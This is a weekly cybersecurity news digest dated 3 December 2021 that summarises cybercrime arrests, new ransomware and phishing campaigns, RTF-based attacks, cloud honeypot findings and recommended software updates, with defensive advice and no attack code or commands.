news211203

Crime and a little punishment

This year has seen a marked improvement in international efforts to combat cyber crime. This week, Interpol said a coordinated investigation led to the arrests of 1,003 people linked to a range of crimes including romance scams, investment frauds, illegal gambling and money laundering. It also resulted in the interception of nearly £27 million and the suspension of 2,350 bank accounts. And Europol announced the arrests of 1,803 'money mules' who help to launder the proceeds of online crime.

On a less positive note, a Russian court imposed a one-year suspended sentence on a member of the notorious FIN7 hacking group. The Record identified the man as Maxim Zhukov Sergeevich who had worked for a company described by the US Department of Justice as a front for FIN7. Zhukov is the first member of a major cybercrime group to be detained and tried in Russia since 2016. His sentence is hardly likely to discourage others.

Although the tools used for cybercrime may be sophisticated, the people who use them don't need to be. That's because it's relatively easy for anyone to set themselves up as a cyber criminal by renting the necessary kit. These tool sets include email templates, scripts and a stylish management interface with which to manage attacks. They're designed to steal credentials and financial details, and in some cases they can defeat multi-factor authentication.

And finally, Symantec is warning about a new ransomware variant which it says is gaining traction among criminal organisations. 'Yanluowang' includes several tools designed to steal passwords stored in browsers, and Symantec says it has been used to target a wide range of sectors including IT services, consultancy and finance. Many of the ransomware strains are designed to be used in two-pronged attacks which not only encrypt data but also threaten to publish it online if the victim refuses to pay up.

Threats

COVID-19: Wretched scumbags have begun harnessing the Omicron variant in phishing emails. The messages appear to come from the NHS and purport to offer a free Omicron PCR test. Bleeping Computer

Adobe: Sneaky campaign uses emails with PDF attachments. If opened, a Google Drive page is displayed with a friendly blue button inviting the user to 'Preview PDF'. Clicking it runs a malicious Windows installer that masquerades as an 'Adobe PDF Component'. It all looks horribly credible. Bleeping Computer

SMS: Examples from Finland and Iran of how text messages are used to distribute malicious software. In both cases, they're designed to persuade users to install a malicious app on Android smartphones. Check Point

North Korea: Sophisticated campaign dissected by Kaspersky. Malicious software targets Windows and Android devices, but the process begins with research that includes hijacking a victim's Facebook account and contacting friends to glean details to use in email lures.

IKEA: The Swedish furniture maker cum housing developer is facing a persistent phishing campaign that appears to originate from internal addresses. The emails look unconvincing, but because they originate from inside the company, recipients are more likely to click on the malicious links they contain. Bleeping Computer

Credit cards: It's probably time for a rethink about credit card numbers because hackers have figured out a way to guess them - and there's nothing we can do about it. The problem is that the numbers follow a fixed pattern. The result is that card details can be bought for as little as £0.75. TechRadar

Disinformation

Facebook took down a COVID-19 disinformation campaign that involved Chinese government officials and was amplified by Chinese state media. 'MetaFace's' end of year Adversarial Threat Report says it removed 524 Facebook accounts that originated primarily in China and targeted English-speaking audiences in the US and UK. In one example, a Facebook user claimed to be a Swiss biologist and criticised the US government for allegedly demanding the WHO keep investigating the Chinese origin of COVID-19. Disinformation networks ("Coordinated Inauthentic Behaviour") linked to Palestine, Poland and Belarus were also taken down. Meanwhile, the Facebook Protect security program has been expanded to include activists, journalists, and government officials.

RTF

Hacking groups connected to Russia, China and India are making increasing use of documents in 'Rich Text Format'. The technique was first spotted earlier this year, but Proofpoint says groups have been optimising it since then. The attack exploits a legitimate feature of the RTF format, which governs how a document should be displayed. Normally, this would be achieved by referring to a local file. The exploit subverts this to retrieve a remote, malicious resource. To defend against this threat, it's important that users are aware of the risk of RTF files - which are often regarded as relatively safe. Such attachments should be scanned with antivirus programs and apps should be kept up to date.

Cloud (in)security

Cloud services offer enormous advantages to organisations, but they're also catnip for attackers. Palo Alto Networks set up deliberately misconfigured servers and found that it took only minutes for attackers to compromise them. Its 'honeypot' network included misconfigured instances of common cloud services including remote desktop protocol (RDP), secure shell protocol (SSH), server message block (SMB), and accounts with default or weak passwords. "When a misconfigured or vulnerable service is exposed to the internet, it takes attackers just a few minutes to discover and compromise the service. There is no margin of error when it comes to the timing of security fixes," Palo Alto said.

Encrypted messaging

An FBI training document underlines the extent to which US law enforcement agencies can access the content of encrypted massaging services such as WhatsApp and iMessage. The infographic, obtained by Rolling Stone, doesn't include new information, but it does show the various legal mechanisms that can be used to extract sensitive data from services that are supposed to be focussed on user privacy. WhatsApp is a particularly rich resource for law enforcement. If presented with a search warrant, it will provide more information - much of it in real time - than other comparable services. That includes not just the contacts of a targeted user, but also other users who have the targeted individual in their contacts.

In brief

China: Security officials in Henan province (one of China's largest) have commissioned a surveillance system designed to track journalists and international students among other "suspicious people", according to documents reviewed by Reuters.

Netflix: Despite longstanding calls to implement two-factor authentication, Netflix still hasn't done so. That's puts users at significant risk because all someone needs to take over an account is a name, email address and credit card number. The Next Web recommends adding your phone number in Settings - though that may not help if an attacker knows that as well.

Clearview: The UK Information Commissioner's Office has announced its intention to impose a £17 million fine on the photo harvesting service. It said Clearview lacked a “lawful reason” for collecting people’s personal photos and information.

Slow: The move to remote working caused by the COVID-19 pandemic was bedevilled by sluggish laptops and often unresponsive IT departments, according to research by Apogee (which provides managed technology services). 35% of workers surveyed said they had faced obstacles in working remotely.

Titles: The 'Principality of Sealand' occupies a decommissioned military fort in the North Sea. Among its money making schemes is the sale of titles such as duke and baron. Unfortunately, its website has been hacked, and all transactions since October 12 have been intercepted. The Record

Don't be evil: Three former employees who were fired by Google in 2019 have sued the company, claiming it violated the part of its code of conduct that says “Don’t Be Evil.” The three say they were sacked for protesting against Google's sale of solutions to US Customs and Border Protection. Motherboard

Updates

The US government’s cybersecurity agency has updated its list of “known exploited vulnerabilities” in commonly used products from Qualcomm, Mikrotik, Zoho and the Apache Software Foundation. CISA has set deadlines for federal agencies to apply fixes for the vulnerabilities - and its catalogue provides a handy checklist for the rest of us.

Zoom: New feature enables desktop clients on Windows and macOS to be updated automatically. We recommend this is activated because of the number of security updates released by Zoom. Just this week, two issues were addressed, one of them rated "high-severity". Those are among 18 updates in the past two months.

HP: Updates to address a vulnerability affecting more than 150 multi-function printers. The issue can be exploited by tricking targets into visiting a webpage containing a maliciously crafted font. It's the process of printing a document containing the font that allows an attacker to execute code remotely.

Exchange: A ransomware gang is accessing corporate networks by exploiting Microsoft Exchange servers that haven't been updated to address 'ProxyShell' vulnerabilities. Red Canary

iOS 15: More problems with the latest iOS version. Numerous users are reporting problems with Bluetooth connectivity in cars. iPhone 12 and iPhone 13 models appear to be most affected. 9to5Mac

MacBook: There appears to be a charging issue affecting some 16-inch MacBook Pro machines. Users have been complaining that the MagSafe 3 connector sometimes fails to deliver the required charge when the device is turned off and the lid is closed. The issue appears to be intermittent and doesn't affect all users.

FFT news digest Dec 3 2021